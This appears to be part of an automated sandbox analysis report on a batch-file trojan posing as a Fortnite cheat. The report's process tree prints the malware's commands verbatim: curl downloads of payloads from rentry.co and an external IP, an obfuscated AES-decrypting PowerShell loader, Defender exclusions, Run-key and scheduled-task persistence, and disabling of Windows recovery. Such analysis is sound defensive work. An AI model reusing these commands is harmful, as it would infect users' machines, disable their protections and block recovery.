Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeDebugPrivilege	2824	powershell.exe
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeDebugPrivilege	5876	powershell.exe
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeShutdownPrivilege	3408	Explorer.EXE
Token: SeCreatePagefilePrivilege	3408	Explorer.EXE
Token: SeDebugPrivilege	5980	powershell.exe
Token: SeAssignPrimaryTokenPrivilege	1644	svchost.exe
Token: SeIncreaseQuotaPrivilege	1644	svchost.exe
Token: SeSecurityPrivilege	1644	svchost.exe
Token: SeTakeOwnershipPrivilege	1644	svchost.exe
Token: SeLoadDriverPrivilege	1644	svchost.exe
Token: SeSystemtimePrivilege	1644	svchost.exe
Token: SeBackupPrivilege	1644	svchost.exe
Token: SeRestorePrivilege	1644	svchost.exe
Token: SeShutdownPrivilege	1644	svchost.exe
Token: SeSystemEnvironmentPrivilege	1644	svchost.exe
Token: SeUndockPrivilege	1644	svchost.exe
Token: SeManageVolumePrivilege	1644	svchost.exe
Token: SeAssignPrimaryTokenPrivilege	1644	svchost.exe
Token: SeIncreaseQuotaPrivilege	1644	svchost.exe
Token: SeSecurityPrivilege	1644	svchost.exe
Token: SeTakeOwnershipPrivilege	1644	svchost.exe
Token: SeLoadDriverPrivilege	1644	svchost.exe
Token: SeSystemtimePrivilege	1644	svchost.exe
Token: SeBackupPrivilege	1644	svchost.exe
Token: SeRestorePrivilege	1644	svchost.exe
Token: SeShutdownPrivilege	1644	svchost.exe
Token: SeSystemEnvironmentPrivilege	1644	svchost.exe

Suspicious use of FindShellTrayWindow 25 IoCs

Processes:

msedge.exe

pid	process
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

Processes:

msedge.exe

pid	process
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe
1680	msedge.exe

Suspicious use of SetWindowsHookEx 4 IoCs

Processes:

Explorer.EXEpowershell.exe

pid process

3408 Explorer.EXE
3408 Explorer.EXE
5980 powershell.exe
3408 Explorer.EXE

pid	process
3408	Explorer.EXE
3408	Explorer.EXE
5980	powershell.exe
3408	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exemsedge.exe

description	pid	process	target process
PID 4436 wrote to memory of 316	4436	cmd.exe	net.exe
PID 4436 wrote to memory of 316	4436	cmd.exe	net.exe
PID 316 wrote to memory of 608	316	net.exe	net1.exe
PID 316 wrote to memory of 608	316	net.exe	net1.exe
PID 4436 wrote to memory of 4864	4436	cmd.exe	timeout.exe
PID 4436 wrote to memory of 4864	4436	cmd.exe	timeout.exe
PID 4436 wrote to memory of 1444	4436	cmd.exe	curl.exe
PID 4436 wrote to memory of 1444	4436	cmd.exe	curl.exe
PID 4436 wrote to memory of 1680	4436	cmd.exe	msedge.exe
PID 4436 wrote to memory of 1680	4436	cmd.exe	msedge.exe
PID 1680 wrote to memory of 2864	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 2864	1680	msedge.exe	msedge.exe
PID 4436 wrote to memory of 3212	4436	cmd.exe	curl.exe
PID 4436 wrote to memory of 3212	4436	cmd.exe	curl.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4680	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 1984	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 1984	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe
PID 1680 wrote to memory of 4104	1680	msedge.exe	msedge.exe

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012
Views/modifies file attributes 1 TTPs 1 IoCs
evasion

Hidden Files and Directories
T1564.001

Processes:

attrib.exe

pid process

5260 attrib.exe

pid	process
5260	attrib.exe

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p
1⤵
PID:796

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
2⤵
PID:4536

C:\Windows\System32\CompPkgSrv.exe
C:\Windows\System32\CompPkgSrv.exe -Embedding
2⤵
PID:2984

C:\Windows\system32\DllHost.exe
C:\Windows\system32\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}
2⤵
PID:5292

C:\Windows\System32\rundll32.exe
C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
2⤵
PID:5432

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k RPCSS -p
1⤵
PID:904

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
1⤵
PID:952

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
1⤵
PID:404

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
1⤵
PID:388

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork -p
1⤵
PID:1060

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
1⤵
PID:1100

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
1⤵
PID:1116

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
1⤵
PID:1156

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
1⤵
PID:1172

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s nsi
1⤵
PID:1296

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s ProfSvc
1⤵
PID:1304

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s DispBrokerDesktopSvc
1⤵
PID:1376

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s Dhcp
1⤵
PID:1392

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s UserManager
1⤵
PID:1536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s EventSystem
1⤵
PID:1544

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s Themes
1⤵
PID:1556

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s NlaSvc
1⤵
PID:1648

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s SENS
1⤵
PID:1704

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s AudioEndpointBuilder
1⤵
PID:1764

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s netprofm
1⤵
PID:1800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:1928

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s Dnscache
1⤵
PID:2012

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p
1⤵
PID:2020

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s Winmgmt
1⤵
- Suspicious use of AdjustPrivilegeToken
PID:1644

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
1⤵
PID:1628

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
1⤵
PID:2052

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNoNetworkFirewall -p
1⤵
PID:2188

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k NetworkService -p -s LanmanWorkstation
1⤵
PID:2232

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -s RmSvc
1⤵
PID:2324

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s IKEEXT
1⤵
PID:2528

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted -p -s PolicyAgent
1⤵
PID:2536

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k UnistackSvcGroup -s CDPUserSvc
1⤵
PID:2684

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k NetworkService -p -s CryptSvc
1⤵
- Modifies data under HKEY_USERS
PID:2740

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s WpnService
1⤵
PID:2800

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s TrkWks
1⤵
PID:2816

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s LanmanServer
1⤵
PID:2972

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s TokenBroker
1⤵
PID:780

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Modifies Internet Explorer settings
- Modifies registry class
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3408

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\aa.bat"
2⤵
- Suspicious use of WriteProcessMemory
PID:4436

C:\Windows\system32\net.exe
net session
3⤵
- Suspicious use of WriteProcessMemory
PID:316

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
4⤵
PID:608

C:\Windows\system32\timeout.exe
timeout /t 4
3⤵
- Delays execution with timeout.exe
PID:4864

C:\Windows\system32\curl.exe
curl -s -o upz.bat https://rentry.co/wmhtrukn/raw
3⤵
PID:1444

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://discord.gg/fncheeto
3⤵
- Enumerates system info in registry
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:1680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffa29d346f8,0x7ffa29d34708,0x7ffa29d34718
4⤵
PID:2864

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2188 /prefetch:2
4⤵
PID:4680

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2260 /prefetch:3
4⤵
- Suspicious behavior: EnumeratesProcesses
PID:1984

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2976 /prefetch:8
4⤵
PID:4104

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3376 /prefetch:1
4⤵
PID:1424

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:1
4⤵
PID:4632

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5080 /prefetch:1
4⤵
PID:1760

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3796 /prefetch:8
4⤵
PID:3116

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=2168,1458668958788233752,12507312071386903196,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5068 /prefetch:8
4⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:2824

C:\Windows\system32\curl.exe
curl -s -o upx.bat https://rentry.co/n4w4tvf2/raw
3⤵
PID:3212

C:\Windows\system32\taskkill.exe
taskkill /F /IM FortniteClient-Win64-Shipping.exe
3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1452

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Salut! hai sa injectam cheatul in FN', 10, 'Eroare', 64);close();"
3⤵
PID:1400

C:\Windows\system32\takeown.exe
takeown /F C:\Windows\System32\CompPkgSup.dll
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
- Suspicious use of AdjustPrivilegeToken
PID:2892

C:\Windows\system32\icacls.exe
icacls C:\Windows\System32\CompPkgSup.dll /grant Administrators:F
3⤵
- Possible privilege escalation attempt
- Modifies file permissions
PID:4344

C:\Windows\system32\curl.exe
curl -s -o upx.bat https://rentry.co/xkto35gv/raw
3⤵
PID:3292

C:\Windows\system32\curl.exe
curl -s -o "C:\Windows\System32\Win.bat" "http://176.96.137.126:3000/download/Lax.bat"
3⤵
- Drops file in System32 directory
PID:2876

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\Windows\System32\Win.bat'"
3⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4504

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\Windows\System32\Win.bat" "
4⤵
- Drops startup file
PID:5192

C:\Windows\system32\attrib.exe
attrib +s +h C:\ProgramData\ubcore
5⤵
- Sets file to hidden
- Views/modifies file attributes
PID:5260

C:\Windows\system32\curl.exe
curl -s -o C:\ProgramData\ubcore\MicrosoftEdge.bat http://176.96.137.126:3000/download/rootkited.bat
5⤵
PID:5276

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell.exe -WindowStyle Hidden -Command "Start-Process -FilePath 'C:\ProgramData\ubcore\MicrosoftEdge.bat' -WindowStyle Hidden"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5336

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c ""C:\ProgramData\ubcore\MicrosoftEdge.bat" "
6⤵
PID:5472

C:\Windows\system32\PING.EXE
ping -n 1 www.google.com
7⤵
- System Network Configuration Discovery: Internet Connection Discovery
- Runs ping.exe
PID:5524

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /S /D /c" echo function decrypt_function($param_var){ $aes_var=[System.Security.Cryptography.Aes]::Create(); $aes_var.Mode=[System.Security.Cryptography.CipherMode]::CBC; $aes_var.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $aes_var.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('ASRknCxDp4etiheySKX7HoUO7MX75S2TThgxNrvf9P0='); $aes_var.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('k9bGkVyIyvagVZMKH9eqKA=='); $decryptor_var=$aes_var.CreateDecryptor(); $return_var=$decryptor_var.TransformFinalBlock($param_var, 0, $param_var.Length); $decryptor_var.Dispose(); $aes_var.Dispose(); $return_var;}function decompress_function($param_var){ $esZHU=New-Object System.IO.MemoryStream(,$param_var); $CyIHI=New-Object System.IO.MemoryStream; $xHhsl=New-Object System.IO.Compression.GZipStream($esZHU, [IO.Compression.CompressionMode]::Decompress); $xHhsl.CopyTo($CyIHI); $xHhsl.Dispose(); $esZHU.Dispose(); $CyIHI.Dispose(); $CyIHI.ToArray();}function execute_function($param_var,$param2_var){ $hfvNe=[System.Reflection.Assembly]::('daoL'[-1..-4] -join '')([byte[]]$param_var); $DgevX=$hfvNe.EntryPoint; $DgevX.Invoke($null, $param2_var);}$DpIzr = 'C:\ProgramData\ubcore\MicrosoftEdge.bat';$host.UI.RawUI.WindowTitle = $DpIzr;$aQJNz=[System.IO.File]::('txeTllAdaeR'[-1..-11] -join '')($DpIzr).Split([Environment]::NewLine);foreach ($kaoWt in $aQJNz) { if ($kaoWt.StartsWith('AHYjqkIktYisQQfJMFol')) { $nnXUv=$kaoWt.Substring(20); break; }}$payloads_var=[string[]]$nnXUv.Split('\');$payload1_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[0].Replace('#', '/').Replace('@', 'A'))));$payload2_var=decompress_function (decrypt_function ([Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($payloads_var[1].Replace('#', '/').Replace('@', 'A'))));execute_function $payload1_var $null;execute_function $payload2_var (,[string[]] ('')); "
7⤵
PID:5972

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w hidden
7⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:5980

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2824

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'powershell.exe'
8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5876

C:\Windows\system32\reg.exe
reg add "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MicrosoftServiceManager" /t REG_SZ /d "wscript.exe \"C:\ProgramData\ubcore\temp.vbs\"" /f
5⤵
- Adds Run key to start application
PID:5540

C:\Windows\system32\reg.exe
reg query "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /v "MicrosoftServiceManager"
5⤵
PID:5556

C:\Windows\system32\schtasks.exe
schtasks /create /tn "WindowsManagerSettings" /tr "C:\ProgramData\ubcore\temp.vbs" /sc onlogon /rl highest /f
5⤵
- Scheduled Task/Job: Scheduled Task
PID:5580

C:\Windows\system32\schtasks.exe
schtasks /query /tn "WindowsManagerSettings"
5⤵
PID:5600

C:\Windows\system32\schtasks.exe
schtasks /create /tn "MicrosoftEdgeServices" /tr "cmd /c start \"\" wscript.exe \"C:\ProgramData\ubcore\temp.vbs\"" /sc ONLOGON /rl HIGHEST /f
5⤵
- Scheduled Task/Job: Scheduled Task
PID:5640

C:\Windows\system32\schtasks.exe
schtasks /query /tn "MicrosoftEdgeServices"
5⤵
PID:5656

C:\Windows\system32\net.exe
net session
5⤵
PID:5684

C:\Windows\system32\net1.exe
C:\Windows\system32\net1 session
6⤵
PID:5704

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'C:\'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5720

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
powershell -ExecutionPolicy Bypass -Command "Add-MpPreference -ExclusionPath 'F:\'"
5⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5840

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\RecoveryEnvironment" /v "DisableReset" /t REG_DWORD /d 1 /f
5⤵
PID:5964

C:\Windows\system32\reg.exe
reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\RecoveryEnvironment" /v "DisableCloudReset" /t REG_DWORD /d 1 /f
5⤵
PID:6044

C:\Windows\system32\ReAgentc.exe
reagentc.exe /disable
5⤵
- Drops file in System32 directory
- Drops file in Windows directory
PID:6124

C:\Windows\system32\mshta.exe
mshta "javascript:var sh=new ActiveXObject('WScript.Shell'); sh.Popup('Cheatul a fost injectat cu success', 10, 'Eroare', 64);close();"
5⤵
PID:2876

C:\Windows\System32\NOTEPAD.EXE
"C:\Windows\System32\NOTEPAD.EXE" C:\Users\Admin\AppData\Local\Temp\upx.bat
2⤵
- Opens file in notepad (likely ransom note)
PID:5440

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalService -p -s CDPSvc
1⤵
PID:3436

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc
1⤵
PID:3604

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc
1⤵
PID:4804

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV
1⤵
PID:4660

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
1⤵
PID:3296

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager
1⤵
PID:3224

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc
1⤵
PID:4940

C:\Windows\system32\svchost.exe
